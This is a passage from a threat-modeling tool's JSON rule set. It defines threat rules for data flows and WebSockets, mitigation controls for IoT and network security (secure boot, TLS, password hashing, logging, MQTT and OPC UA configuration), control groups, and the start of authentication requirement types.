3-10-9)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["a77f314c-f74e-4340-a993-5a1a24f26db4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":1,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"b06930a0-bff1-49e4-889c-6211290de683","Name":"Process denies reading data","Description":"Process has inbound data flow from data store. E.g., process claims not to have read from data store. (see Threat modeling - designing for security: Table 3-10-10)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["a77f314c-f74e-4340-a993-5a1a24f26db4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":0,"NodeTypes":[{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"2a171a21-0d62-4159-b7ab-5e2ad1796fff","Name":"Data store reveals information","Description":"Process has inbound data flow from data store. E.g., data store discloses information. (see Threat modeling - designing for security: Table 3-10-10)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["369640cc-1b53-4a2e-9e3b-a74c187e68e7"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":0,"NodeTypes":[{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"7e4e6144-6504-4796-a3ca-00962c0a9cbb","Name":"Data store cannot be read from","Description":"Process has inbound data flow from data store. E.g., data store cannot be read from. (see Threat modeling - designing for security: Table 3-10-10)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["422b9042-212d-4467-a000-2528a2e09f8b"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":0,"NodeTypes":[{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"d59a4a10-780a-465b-86fa-292a07e7a89a","Name":"External entity is spoofed","Description":"Ext. entity passes input to process. E.g., process is confused by the identify of the ext. entity. (see Threat modeling - designing for security: Table 3-10-11)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["3bbe354c-317a-4f76-bdbb-75543b5d5aa4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":0,"NodeTypes":[{"TypeIDs":["02b39924-b8f2-44da-a2bc-be1bd2450f68","03e3750c-8549-4589-8269-e0121b3f26a4"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}},{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ProvidesSenderAuthenticity","ComparisonType":"==","Value":false}}]}},{"ID":"d675c061-7af1-4e49-a503-0b512a85f9da","Name":"Process denies receiving data","Description":"Ext. entity passes input to process. E.g., process claims not to have received data. (see Threat modeling - designing for security: Table 3-10-11)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["a77f314c-f74e-4340-a993-5a1a24f26db4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":0,"NodeTypes":[{"TypeIDs":["02b39924-b8f2-44da-a2bc-be1bd2450f68","03e3750c-8549-4589-8269-e0121b3f26a4"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"427f13f4-ce93-4344-b6fc-1178ea54199e","Name":"Process is spoofed","Description":"Ext. entity gets input from process. E.g., ext. entity is confused about the identify of the process. (see Threat modeling - designing for security: Table 3-10-11)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["3bbe354c-317a-4f76-bdbb-75543b5d5aa4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":0,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["02b39924-b8f2-44da-a2bc-be1bd2450f68","03e3750c-8549-4589-8269-e0121b3f26a4"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"b8d4d723-fe3b-4288-87da-c73fc2412fc5","Name":"Message sniffing","Description":"You should strongly prefer the secure wss:// protocol over the insecure ws:// transport. Like HTTPS, WSS (WebSockets over SSL/TLS) is encrypted, thus protecting against man-in-the-middle attacks. A variety of attacks against WebSockets become impossible if the transport is secured.","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"e58fcbde-e429-4704-9f22-c00d187994bc","ThreatCategoryIDs":["8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"aa2ca59f-4045-4cb4-a25d-b23c4b456be5","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"cb908fd2-f59c-4f56-ac91-bc1192df5af0","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"fa8d45ee-bfc7-47d7-9eed-4b38bc797336","Name":"Tunneling","Description":"It\u2019s relatively easy to tunnel arbitrary TCP services through a WebSocket. So you could, for example, tunnel a database connection directly through to the browser. This is very dangerous, however. Doing so would enable access to these services to an in-browser attacker in the case of a cross-site scripting attack, thus allowing an escalation of a XSS attack into a complete remote breach.","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","b869918c-0b47-45c3-8fab-0b698043aa66","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"aa2ca59f-4045-4cb4-a25d-b23c4b456be5","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"0d2c8df9-271f-42e2-b3fe-cb74719ff39b","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"db990108-a992-40e4-b2fc-d4dd00d42431","Name":"Missing client data validation","Description":"WebSocket connections are easily established outside of a browser, so you should assume that you need to deal with arbitrary data. Just as with any data coming from a client, you should carefully validate input before processing it.","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"],"AttackVectorID":"b48781b2-24a2-481b-b7c1-3390dbeeb973"},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"aa2ca59f-4045-4cb4-a25d-b23c4b456be5","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"8cd86481-a82f-490d-8d62-2195981779e9","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"ac0e3170-0187-47e8-a2ed-6671cc24137e","Name":"Missing server data validation","Description":"You should apply equal suspicion to data returned from the server, as well. Always process messages received on the client side as data. Don\u2019t try to assign them directly to the DOM, nor evaluate as code. If the response is JSON, always use JSON.parse() to safely parse the data.","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["c0bd6e2f-9784-4c11-9aee-115a966e0a4d"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"aa2ca59f-4045-4cb4-a25d-b23c4b456be5","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"92c3d3ef-aa2d-4920-978e-ff1755479308","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"7d0edcb5-7eff-490e-8d29-db68172ddd20","Name":"Missing authentication and authorization","Description":"The WebSocket protocol doesn\u2019t handle authorization or authentication. Practically, this means that a WebSocket opened from a page behind auth doesn\u2019t \u201cautomatically\u201d receive any sort of auth; you need to take steps to also secure the WebSocket connection.","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"d46f6e31-ae41-4d6e-93fc-0e6c3bbb295d","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"aa2ca59f-4045-4cb4-a25d-b23c4b456be5","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"485ff476-0c99-41de-b90a-4fdd27730685","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"cc7e24ac-cfc0-4cf8-a291-386735862947","Name":"Denial of service attack","Description":"WebSockets let an unlimited number of connections reach the server. This lets an attacker flood the server with a DOS attack. This greatly strains the server and exhausts the resources on that server. Then the website slows down greatly.","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"8f9a24d4-e962-4136-b0ec-8e9f797a6f62","ThreatCategoryIDs":["b869918c-0b47-45c3-8fab-0b698043aa66"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"aa2ca59f-4045-4cb4-a25d-b23c4b456be5","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"9616fd88-1e3d-4d72-9178-ad81d793a744","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"341eaf3e-808c-45de-9445-6be3cc66777b","Name":"Access restriction for authorized users","Description":"Access could be restricted for authorized users if attackers use all available connections ","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["b869918c-0b47-45c3-8fab-0b698043aa66"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"aa2ca59f-4045-4cb4-a25d-b23c4b456be5","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"9616fd88-1e3d-4d72-9178-ad81d793a744","ComparisonType":"==","Value":true}}]},"Severity":2}],"controls":[{"ID":"99636fb9-9a42-48b5-8368-a935a11dc943","Name":"Disable debug access","Description":"","mitigatedAttackVectorIDs":["8a6476b9-7a5c-4306-bd43-db6fe32bbf66"],"MitigationTips":[{"Name":"Remove interface","Description":"Any interface used for administration or test purposes during development should be removed from a production device, disabled or made physically inaccessible.","LifeCycles":["I"]},{"Name":"Disable interface","Description":"All test access points on production units must be disabled or locked, for example by blowing on-chip fuses to disable JTAG.","LifeCycles":["P"]},{"Name":"Enable access control","Description":"If a production device must have an administration port, ensure it has effective access controls, e.g. strong credential management, restricted ports, secure protocols etc.","LifeCycles":["I"]}],"mitigatedThreatRuleIDs":["821594a6-02e5-4a15-9a72-9cca5b57ee92","7cfa63f6-262b-4da3-aa88-6478522b45c5"]},{"ID":"8febb6ed-da70-44ff-8d95-cf9a30d6b0ec","Name":"Device casing mitigations","Description":"","mitigatedAttackVectorIDs":[],"MitigationTips":[{"Name":"PCB design","Description":"Make the device circuitry physically inaccessible to tampering, e.g. epoxy chips to circuit board, resin encapsulation, hiding data and address lines under these components etc.","LifeCycles":["I"]},{"Name":"Protective casing","Description":"Provide secure protective casing and mounting options for deployment of devices in exposed locations.","LifeCycles":["C"]},{"Name":"Tamper evident packaging","Description":"To identify and deter access within the supply chain, consider making the device and packaging \u201ctamper evident\u201d.","LifeCycles":["C"]},{"Name":"Active masking","Description":"For high-security deployments, consider design measures such as active masking or shielding to protect against side-channel attacks.","LifeCycles":["C"]}],"mitigatedThreatRuleIDs":["a3c2f053-c8d6-4626-ae54-79f87ae171c3"]},{"ID":"c943341c-b65c-4801-8d8e-d83d047ac0b7","Name":"Secure boot","Description":"","mitigatedAttackVectorIDs":[],"MitigationTips":[],"mitigatedThreatRuleIDs":["11975f59-55e0-420f-9366-513175e9236e","61e37274-9751-4250-8a4d-6476edc8f732","1487298b-ff88-4e01-9a60-09b1eaf8a41f","10a258f6-49c0-435e-9a66-630039de0dc8","5d407978-73dc-45c9-8402-db692b42dae4"]},{"ID":"ea061d92-c31b-4644-8f5f-5093f513dd9d","Name":"Traffic data encryption","Description":"","mitigatedAttackVectorIDs":["e58fcbde-e429-4704-9f22-c00d187994bc","bb7358c1-e5b6-424f-962d-daab17345b63","001ba17c-0400-4369-912e-0ceda3ccd227"],"mitigatedThreatRuleIDs":[],"MitigationTips":[{"Name":"Mutual authentication","Description":"Use strong mutual authentication to ensure the authenticity of both endpoints. ","LifeCycles":["C"]},{"Name":"Signed certificates","Description":"Validate the authenticity of public keys by their certificates. Validate the entire certificate chain. ","LifeCycles":["I"]},{"Name":"Use TLS","Description":"Use the latest version of TLS and include only strong cipher suits. ","LifeCycles":["I"]},{"Name":"Lightweight cryptography","Description":"In case TLS is not possible due to performance issues, choose an adequate lightweight cryptography algorithm.","LifeCycles":["I"]},{"Name":"Ensure integrity","Description":"If no sensitive data are transmitted and performance is a bottle neck, ensure at least the integrity of messages using a message authentication code (MAC).","LifeCycles":["I"]},{"Name":"Ensure replay protection","Description":"Ensure that it is not possible for a captured and resend package to be treated as legitimate.  ","LifeCycles":["I"]}]},{"ID":"8827b03b-475a-474f-baa1-7de740e244ba","Name":"Input validation","Description":"https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html","mitigatedAttackVectorIDs":["d92ccd9c-3a24-4e07-a2ca-c1e9949bb386"],"mitigatedThreatRuleIDs":[],"MitigationTips":[]},{"ID":"9ed45808-7ffa-412a-ab29-84c0e738c8da","Name":"NV memory encryption","Description":"Encrypt the non-volatile memory","mitigatedAttackVectorIDs":["e851a284-6b41-41c9-9efd-dc8b01f788da"],"mitigatedThreatRuleIDs":[],"MitigationTips":[]},{"ID":"a5beea3e-c1e2-40ef-9056-8540c7f5557d","Name":"Certificate validation","Description":"","mitigatedAttackVectorIDs":["0b47795b-b42d-49d1-bf50-7f4889994fea","6509fe5f-7e27-40ec-bd08-97e29c67f8c1","ed84da5f-3181-4be1-bef4-d911077b1910","b26fc3e4-7a38-4f00-acdb-ec78246d0b25"],"mitigatedThreatRuleIDs":[],"MitigationTips":[{"Name":"Certificate pinning","Description":"https://owasp.org/www-community/controls/Certificate_and_Public_Key_Pinning","LifeCycles":["I"]},{"Name":"Check expiration","Description":"","LifeCycles":["I"]},{"Name":"Check certificate chain","Description":"","LifeCycles":["I"]},{"Name":"Check revocation","Description":"","LifeCycles":["I"]},{"Name":"Check properties","Description":"Check all relevant certificate properties such as hostname","LifeCycles":["I"]}]},{"ID":"af734914-6fe1-4ace-8895-a004472c9d13","Name":"True random number generator","Description":"The generation of true random numbers is essential for many cryptographic operations. However, many pseudo-random number generators (PRNGs) are not cryptographically secure.","mitigatedAttackVectorIDs":["0ffd675d-d83c-4f74-8835-398e7f3930cb"],"mitigatedThreatRuleIDs":[],"MitigationTips":[{"Name":"Use hardware TRNG","Description":"Many modern microcontroller ship with a true random number generator (TRNG). As this entropy source may be slow, it may be necessary to combine the TRNG with a cryptographically secure PRNG (CSPRNG). ","LifeCycles":["C"]},{"Name":"Use CSPRNG","Description":"","LifeCycles":["I"]},{"Name":"Use different entropy sources","Description":"Try to collect entropy from different sources, e.g. network traffic, human interaction, etc. ","LifeCycles":["I"]},{"Name":"Test the entropy","Description":"Test the generated entropy according to NIST SP 800-90 and SP 800-22, for example.","LifeCycles":["I"]}]},{"ID":"34eb5948-314a-4a99-a782-c5ed7d26df01","Name":"Strong block cipher mode","Description":"Review the latest recommendations from organizations such as NIST.","mitigatedAttackVectorIDs":["a20d6e53-4426-4700-a04f-a4018bc7bfce"],"mitigatedThreatRuleIDs":[],"MitigationTips":[{"Name":"Use authenticated encryption","Description":"Modes for authenticated encryption (AE) ensure confidentiality as well as integrity. Plaintext data (e.g. in headers) can also be protected against manipulation when using a AE with associated data (AEAD). ","LifeCycles":["I"]}]},{"ID":"51afbfbf-f5f5-40f7-908f-5db63ed5e1ca","Name":"Use IV and Nonce only once","Description":"Use an initialization vector (IV) or nonce (number used only once) only once. ","mitigatedAttackVectorIDs":["680ceebd-357c-49d6-8bfd-390dc6c51dde"],"mitigatedThreatRuleIDs":[],"MitigationTips":[{"Name":"Generate the IV using a CSPRNG","Description":"While it is legit to use a counter (1, 2, 3, ...), it is more practical to use a random number (generated by a cryptographically secure pseudo random number generator, CSPRNG). As IVs often have 96 bits or more, it is improbable that a number is generated twice with a CSPRNG","LifeCycles":["I"]}]},{"ID":"43834e91-cb84-407e-9819-ffbc58b405a0","Name":"Secure password storage","Description":"","mitigatedAttackVectorIDs":["f0ef09ed-0cde-4b12-beb6-f1640132f3e6","0e3c0e3e-1587-46f8-93ea-e9091dff5958","05e04798-41ce-4919-a92b-264f7e985de2"],"mitigatedThreatRuleIDs":[],"MitigationTips":[{"Name":"Use hash with salt","Description":"Do not store the password in plain text. Store the output of a cryptographic hash function. Before hashing the password, combine it with a unique, random salt (random bit string that can be treated as public) --\x3e store hash(password | salt), for example. ","LifeCycles":["I"]},{"Name":"Use password hashing algorithm","Description":"Not all cryptographic hash algorithms are suitable for hashing, as they are too fast, e.g. SHA2. Use a password hashing algorithm such as bcrypt or argon2.   ","LifeCycles":["I"]}]},{"ID":"a23f9f78-27a6-4a21-8c48-29a2afd48830","Name":"Logging","Description":"https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html","mitigatedAttackVectorIDs":["71f761e4-8149-4a88-92fd-35f9d99cc0ef","afd4bceb-31b0-41cd-9eae-02d2eba6b41c"],"mitigatedThreatRuleIDs":["b9caf305-7c53-48c9-beef-2fb2a96cc5b0","778eb19f-8f36-4ce5-aa48-70429386b113","c4df07d3-101f-492e-9f90-70d916f7ed43","b0d13562-1629-4724-bb67-f910157ed1c9","b4c216c0-ccab-4a4d-a156-1b4979dc2aec","c6ac1dcf-ff18-4810-ba64-10aaaf44c135","f51350c5-5401-4276-a8e5-14eba86bc070","e145ffad-ec47-4251-9fa4-1475133db2ff"],"MitigationTips":[{"Name":"Separate storage","Description":"Store logs in a separate partition or memory chip.","LifeCycles":["C"]},{"Name":"Central log backup","Description":"Send logs to a central backup storage","LifeCycles":["C"]},{"Name":"Restrict access","Description":"Restrict access to log files","LifeCycles":["I"]},{"Name":"Cryptographically protect logs","Description":"Ensure confidentiality, integrity, and authenticity of log files","LifeCycles":["I"]},{"Name":"Do\'s","Description":"Log: login, logout, authentication attempt, inactivity, password change, configuration change, privilege change, failures and errors, network activity, ....","LifeCycles":["I"]},{"Name":"Don\'ts","Description":"Don\'t log: passwords\\nAvoid: personal identifiable information (PII)","LifeCycles":["I"]},{"Name":"Evaluate logs","Description":"Monitor and evaluate the logs files for anomalies","LifeCycles":["O"]},{"Name":"Ensure availability","Description":"Attackers may attack log files in order to exhaust disk space or to overwrite them. Another goal could be to decrease the application performance. ","LifeCycles":["O"]}]},{"ID":"6149966a-4422-4b32-ac28-88a2ded07354","Name":"Cloud service recovery","Description":"","mitigatedAttackVectorIDs":[],"mitigatedThreatRuleIDs":["b05b7085-3952-4f0d-bb85-7c380eb32f92"],"MitigationTips":[{"Name":"Adopt a geographically redudant configuration","Description":"","LifeCycles":["O"]}]},{"ID":"113386c4-73e2-4e37-a390-83c3ef939633","Name":"OPC UA secure configuration","Description":"See Practical Security Recommendations for building OPC UA Applications by OPC Fundation","mitigatedAttackVectorIDs":[],"mitigatedThreatRuleIDs":["ea2ba48d-b7f9-42c9-b9d9-f4a9816383b0","7f6ca653-a703-480c-b5d8-d82243171994","289c20cd-ea84-4375-8453-b045b94e1dc6","3a44327d-24d1-4c53-a3ea-7d891fb86f47"],"MitigationTips":[{"Name":"User authentication","Description":"The possibility of logging in with the identifier \u2018anonymous\u2019 should be used only for accessing non-critical UA server resources as it does not provide any protection","LifeCycles":["C","I"]},{"Name":"Security mode","Description":" The SecurityMode should be \u2018Sign\u2019 or \u2018SignAndEncrypt\u2019","LifeCycles":["I"]},{"Name":"Cryptographic algorithms","Description":"At a minimum, the SecurityPolicy \u2018Basic256Sha256\u2019 should be chosen","LifeCycles":["I"]},{"Name":"Use certificates","Description":"Don\u2019t accept connections which do not provide trusted certificates","LifeCycles":["I"]},{"Name":"Certificate and private key storage","Description":"Never store private keys or the corresponding certificate files (.pfx/p12) on an unencrypted file system","LifeCycles":["I"]},{"Name":" Managing and maintaining certificates","Description":"Use certificate trust lists and certificate revocation lists to manage valid certificates","LifeCycles":["I"]}]},{"ID":"6986a3d3-c10f-4ffb-a348-fafe9c8c9150","Name":"MQTT secure configuration","Description":"","mitigatedAttackVectorIDs":[],"mitigatedThreatRuleIDs":["a89ed38a-c36b-445b-a8c2-89e7289cdb9e","104ac1d9-34d6-4ce7-97f1-6d3dedcfbb59"],"MitigationTips":[{"Name":"Define access control lists for topcis","Description":"","LifeCycles":["C","I"]},{"Name":"Use MQTT over TLS","Description":"Use MQTT over TLS on port 8883","LifeCycles":["I"]},{"Name":"Use X.509 client certificates","Description":"","LifeCycles":["I"]},{"Name":"Define maximum message size","Description":"MQTT defines a maximum message size of 256MB. In most MQTT deployment scenarios, messages are often smaller than a kilobyte. If you are familiar with your usage scenario and you know the maximum message size that can occur, it makes sense to decrease the maximum allowed message size to that limit. If no limit is set, it is possible for malicious MQTT clients to send large messages (which can result in excessive memory consumption and unneeded bandwidth usage).","LifeCycles":["I"]}]},{"ID":"76ed8c24-b89e-4eb1-9d09-a97548729ba5","Name":"DoS protection","Description":"DoS depends on the used network interfaces, protocols and operating system","mitigatedAttackVectorIDs":[],"mitigatedThreatRuleIDs":["7b825bd7-222e-476f-bf22-85fe2e50eb6c"],"MitigationTips":[{"Name":"Use challenges","Description":"Use challenges like CAPTCHA to filter requests by bots","LifeCycles":["I"]},{"Name":"Use a web application firewall","Description":"","LifeCycles":["I"]},{"Name":"Use intrusion detection/prevention system","Description":"Use a intrusion detection/prevention such as Fail2ban","LifeCycles":["I"]}]},{"ID":"bb8d07ff-b13e-437c-9483-bee76a98bb84","Name":"Anti-rollback protection","Description":"The goal of anti-rollback protection is to prevent downgrading of the device to an older version of its software, which has been deprecated due to security concerns.\\n\\nhttps://developer.trustedfirmware.org/w/tf_m/design/trusted_boot/rollback_protection/","mitigatedAttackVectorIDs":[],"mitigatedThreatRuleIDs":["c6535534-7656-4819-93fe-19d9a78a9390"],"MitigationTips":[{"Name":"Security counter","Description":"Implement an additional security counter, independently from the firmware version, to ensure anti-rollback protection. This allows downgrades to a version without bugs, for example, but prevents downgrades to vulnerable ones.  ","LifeCycles":["C","I","U"]}]},{"ID":"fd548c36-f9ae-4c1e-8244-477c7d121c36","Name":"WebSocket security","Description":"https://devcenter.heroku.com/articles/websocket-security\\nhttps://brightsec.com/blog/websocket-security-top-vulnerabilities/#vulnerability-to-input-data","mitigatedAttackVectorIDs":[],"mitigatedThreatRuleIDs":["b8d4d723-fe3b-4288-87da-c73fc2412fc5","fa8d45ee-bfc7-47d7-9eed-4b38bc797336","db990108-a992-40e4-b2fc-d4dd00d42431","ac0e3170-0187-47e8-a2ed-6671cc24137e","7d0edcb5-7eff-490e-8d29-db68172ddd20","cc7e24ac-cfc0-4cf8-a291-386735862947"],"MitigationTips":[{"Name":"Avoid tunneling","Description":"Tunneling arbitrary TCP services via a WebSocket is easy. This is a risk that needs to be prevented. The best way to avoid this issue? Just avoid tunneling whenever possible.","LifeCycles":["C","I"]},{"Name":"Use secure wss://","Description":"","LifeCycles":["I"]},{"Name":"Validate client input","Description":"Carefully validate input before processing it","LifeCycles":["I"]},{"Name":"Validate server data","Description":"lways process messages received on the client side as data. Don\u2019t try to assign them directly to the DOM, nor evaluate as code. If the response is JSON, always use JSON.parse() to safely parse the data.","LifeCycles":["I"]},{"Name":"Authentication / authorization","Description":"https://devcenter.heroku.com/articles/websocket-security#authentication-authorization\\nImplement a ticket-based authentication","LifeCycles":["I"]},{"Name":"Limit rate","Description":"Rate limiting is an important way to prevent abuse of your web application or web service. It can protect against bad bots, scraping attacks, and small-scale denial of service (DoS) attacks. In some cases, a malfunctioning client can result in an accidental DoS attack.","LifeCycles":["I"]},{"Name":"Use origin header","Description":"The WebSocket standard defines an Origin header field, which web browsers set to the URL that originates a WebSocket request. This can be used to differentiate between WebSocket connections from different hosts, or between those made from a browser and some other kind of network client.","LifeCycles":["I"]}]}],"controlGroups":[{"ID":"6dd5db7a-e54f-4e6f-858a-33449024cf88","Name":"Controls","Description":"","controlGroupIDs":["c324cdd7-8c3e-4d10-a91e-202a725430df","4df9ab6b-eb2f-4fc7-8bd7-8b6c2d03e922","627ed2f3-d2af-4f25-925b-2e93a9578a93","b6aceef6-08e1-4b2f-83a7-32c2bc736962","10c43f72-7e1c-4055-b8e8-321d17a0109e","3103fa1a-00eb-4361-864d-7f129333db08"],"controlIDs":[]},{"ID":"c324cdd7-8c3e-4d10-a91e-202a725430df","Name":"Physical Security","Description":"https://www.iotsecurityfoundation.org/wp-content/uploads/2019/12/Best-Practice-Guides-Release-2_Digitalv3.pdf","controlGroupIDs":[],"controlIDs":["99636fb9-9a42-48b5-8368-a935a11dc943","8febb6ed-da70-44ff-8d95-cf9a30d6b0ec"]},{"ID":"4df9ab6b-eb2f-4fc7-8bd7-8b6c2d03e922","Name":"Firmware Security","Description":"","controlGroupIDs":[],"controlIDs":["c943341c-b65c-4801-8d8e-d83d047ac0b7","9ed45808-7ffa-412a-ab29-84c0e738c8da","bb8d07ff-b13e-437c-9483-bee76a98bb84"]},{"ID":"627ed2f3-d2af-4f25-925b-2e93a9578a93","Name":"Network Security","Description":"","controlGroupIDs":[],"controlIDs":["ea061d92-c31b-4644-8f5f-5093f513dd9d","113386c4-73e2-4e37-a390-83c3ef939633","6986a3d3-c10f-4ffb-a348-fafe9c8c9150","76ed8c24-b89e-4eb1-9d09-a97548729ba5","fd548c36-f9ae-4c1e-8244-477c7d121c36"]},{"ID":"b6aceef6-08e1-4b2f-83a7-32c2bc736962","Name":"Application Security","Description":"","controlGroupIDs":[],"controlIDs":["8827b03b-475a-474f-baa1-7de740e244ba","a5beea3e-c1e2-40ef-9056-8540c7f5557d","a23f9f78-27a6-4a21-8c48-29a2afd48830"]},{"ID":"10c43f72-7e1c-4055-b8e8-321d17a0109e","Name":"Cryptography Mitigations","Description":"","controlGroupIDs":[],"controlIDs":["af734914-6fe1-4ace-8895-a004472c9d13","34eb5948-314a-4a99-a782-c5ed7d26df01","51afbfbf-f5f5-40f7-908f-5db63ed5e1ca","43834e91-cb84-407e-9819-ffbc58b405a0"]},{"ID":"3103fa1a-00eb-4361-864d-7f129333db08","Name":"Recovery","Description":"","controlGroupIDs":[],"controlIDs":["6149966a-4422-4b32-ac28-88a2ded07354"]}],"requirementTypes":[{"ID":"b008aede-3518-44f3-8cc2-7e92b68e0329","Name":"CR-1-1 Human user identification and authentication","Description":" ","subReqTypeIDs":["6dbaec8c-55cd-402e-9f9b-8089ad5d8e88","91a52e70-60f4-430c-b2f8-292e80931d70"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{"RuleType":1,"SWRule":{"ComponentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","PropertyRest":{"ID":"IsActive","ComparisonType":"==","Value":true}}}},{"ID":"6dbaec8c-55cd-402e-9f9b-8089ad5d8e88","Name":"RE-1 Unique identification and authentication","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{"SWRule":{"ComponentTypeID":"7e64d98b-ecbe-4921-9545-8b30d0f9bde8","PropertyRest":{"ID":"6391f8f2-eb04-4caf-b490-49c920315867","ComparisonType":"==","Value":true}},"NeedsReview":false,"RuleType":1}},{"ID":"91a52e70-60f4-430c-b2f8-292e80931d70","Name":"RE-2 Multifactor authentication for all 